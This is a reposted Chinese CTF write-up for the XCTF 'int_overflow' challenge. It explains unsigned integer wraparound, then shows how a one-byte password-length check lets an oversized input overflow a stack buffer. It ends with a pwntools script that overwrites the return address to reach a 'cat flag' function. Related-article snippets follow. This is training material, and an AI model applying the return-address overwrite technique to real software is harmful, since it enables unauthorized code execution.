php整数溢出 ctf,经典整数溢出漏洞示例 XCTF int_overflow

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量1.3k 收藏 3
点赞数
文章标签: php整数溢出 ctf

原标题:经典整数溢出漏洞示例 XCTF int_overflow

45eb09a97c1fd193fab9273d01249af1.png

本文为看雪论坛优秀文章

看雪论坛作者ID:IS信息

整数溢出原理

整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下:

98238a3e5382cb091d999efeb89951a6.png

对于unsigned short int类型的两个变量var1、var2,假定取值var1 = 1,var2 = 65537。

654b05b064f856048dc47467628b3a3f.png

C语言测试代码如下:

#include

intmain

{

unsignedshortintvar1 = 1, var2 = 65537;

if(var1 == var2)

{

printf( "溢出"

}

return0;

}

编译运行截屏如下:

9d25882d33cd254a792b3cdeb9806bac.png

也就是说,对于一个2字节的Unsigned short int型变量,它的有效数据长度为两个字节,当它的数据长度超过两个字节时,就溢出,溢出的部分则直接忽略,使用相关变量时,使用的数据仅为最后2个字节,因此就会出现65537等于1的情况,其他类型变量和数值与之类似。

接下来看XCTF攻防世界里面的一道题:int_overflow。

127fb277278062609a61a015a6db71c8.png

32位,No canary found。

首先在main函数中,没有任何可疑的。

c0a9e59a6dd5ac90ed2abfb4a04f4b82.png

进入login函数:

接受了一个最大长度为0x199的password。

f40aa8294aedc8e949cf5adda99df9a2.png

进入check_passwd函数:

用一个一字节,8bit的变量存储password的长度,之后存在一个字符串拷贝,拷贝目的地在栈中,长度为14h,及0x14,十进制20。

211e4686e856e3cc262738cd5fa97074.png

结合前面溢出原理分析,0x199(十进制409)的长度远大于1字节,即:

62ddf44dbaaa6898b15bb222c476dbe0.png

也就是说,这里存在证书溢出,password字符串的长度可以是3-8个字符,也可以是259-264个字符,接下来查看如何利用此漏洞。

查看字符串,发现cat flag字符串,查看调用:

abfa1e6dd84e135b836910b2dad9c0d7.png

f7d46ea3a112cbbe4d52f94bcbc30d46.png

也就是说,可以在字符串拷贝过程中,输入0x14个字符之后,就可以覆盖函数返回地址了,具体是不是0x14个字符,我们再看汇编语言。

02129f856e7de6948285fc33f71a44f8.png

在字符串拷贝之前,先把拷贝的源地址和目的地址压入堆栈,这里似乎没有任何问题,查看整个函数的汇编代码,就会发现,在函数最开始,压入了ebp变量,在函数结尾,存在一条leave指令,而在32位程序中,leave指令等于mov esp,ebp和pop ebp两条指令的组合,也就是说,在覆盖函数放回地址之前,还有一次出栈操作,出栈数据大小4字节,即覆盖之前还需将这4字节覆盖了,才能实现跳转指向what_is_this函数,编写利用脚本如下:

259-264之间随机选择一个数,这里取262,264-0x14-4-4=234

即:

frompwn import*

io = remote( "111.198.29.45", 47271)

cat_flag_addr = 0x0804868B

io.sendlineafter( "Your choice:", "1")

io.sendlineafter( "your username:", "kk")

io.recvuntil( "your passwd:")

payload = "a"* 0x14+ "aaaa"+ p32(cat_flag_addr)+ "a"* 234

io.sendline(payload)

io.recv

io.interactive

7fd28a777f57a3969f785eb843a3c8d4.png

成功拿到flag,溢出成功。

1935d8ee220d1bac8135bf0c05f9f5eb.png

看雪ID:IS信息

https://bbs.pediy.com/user-794232.htm

*本文由看雪论坛 IS信息 原创,转载请注明来自看雪社区

进阶安全圈,不得不读的一本书

责任编辑:

旺家威
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解析PHPintval()等int转换时的意外异常情况
12-19
先看看下面的网上的一个测试代码:复制代码 代码如下:<?php$a = 9.45*100;var_dump($a);var_dump(intval($a));$a = 945*1.00;var_dump($a);var_dump(intval($a));?><SPAN style=”WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 12px Simsun; WHITE-SPACE: normal; ORPHANS: 2; FLOAT: none; LETTER-SPACING
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 920
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2561
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1794
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1351
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
PHP5.5.9整数溢出漏洞
qq_53099802的博客
05-26 2407
php5.5.9整数溢出漏洞
Hackergame 2021 Web题2 卖瓜 题解(PHP整型溢出漏洞
Landasika的博客
10-31 453
本人小白入门,不到之处请大侠指点!!! 首先来了解了解PHP整型溢出漏洞PHP: Integer 整型 - Manual 正常情况下,我们定义整型不会出现溢出现象(溢出原理和C语言的整型溢出差不多) <?php $a=1234;//十进制数 $a=0123;//八进制数(等于十进制83) $a=0x1A;//十六进制数(等于十进制26) $a=0b11111111;//二进制数字(等于十进制255) $a=1_234_567;//整型数值...
PHP7 ZipArchive 整型溢出漏洞及修复方案
10-14 925
东方联盟郭盛华/漏洞描述: ZipArchive是PHP中用于解压缩zip包的类库。有研究人员发现在PHP 7.x环境下使用getFromIndex()和getFromName()这两个方法时,通过构造的特殊的zip包可导致PHP程序溢出,攻击者利用该漏洞可造成拒绝服务或执行任意代码。 影响版本: 7.x-7.0.5 漏洞等级: 高危 修复建议: 1、升级PHP至最新版本。 2、使用百度云加速,...
从一道CTF题看整数溢出
csd_ct的专栏
06-07 1514
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.csdn.net/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...
CTF 两道web整数溢出题目(猫咪银行和ltshop)
weixin_30305735的博客
11-19 955
①猫咪银行: (2018中科大hackgame) 一开始给十个CTB,而flag需要20个CTB,我们需要理财赚够20个。 理财是只能买入TDSU才可以获得收益。我们先上来直接把CTB全部换成TDSU。 上边是我们花了所有TDSU:66060买了19分钟后的收益。(因为一个账号最多存在20分钟,计算你用脚本极限也不能买20分钟,必须留一分钟用来换TDSU和买入,取出等操作) ...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
缓冲区溢出漏洞攻击——Shellcode编写
热门推荐
pianogirl123的博客
12-19 1万+
一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符覆盖了返回地址。如果覆盖的返回地址是一个有效地址,而在该地址处又有有效的指令,那么系统就会毫不犹豫地跳到该地址处去执行指令。本次实验中用到了跳板(jmp esp)由于操作系统每次
CTF---php反序列化字符串溢出
3tefanie丶zhou的博客
12-28 2605
【我们的言语,既会千山万水,迷障横生,也能铺路搭桥,柳暗花明。故而与亲近之人朝夕久处,不可说气话,不可说反话,不可不说话。】
整数溢出
每昔的博客
07-27 994
     转自:   https://blog.csdn.net/ioio_jy/article/details/50576353         整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一...
abs 不会整数 方法 溢出_【分享】PHP int 超大溢出整数的 加减运算函数,如果有更好的方法欢迎探讨...
weixin_39614877的博客
12-19 88
PHP 溢出 加减运算 超大整数分享一个溢出整数加减的运算函数,刚刚写的,对于溢出整数可以用这个来进行加减运算。遗憾的几点是:一代码太多;二只有加减运算,乘除取余都没有;其实还有一个更简便的方式就是用SQL数据库的:SELECT n1+n2;mysql> SELECT 11234123413241341234123412341234+1;+-------------------------...
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值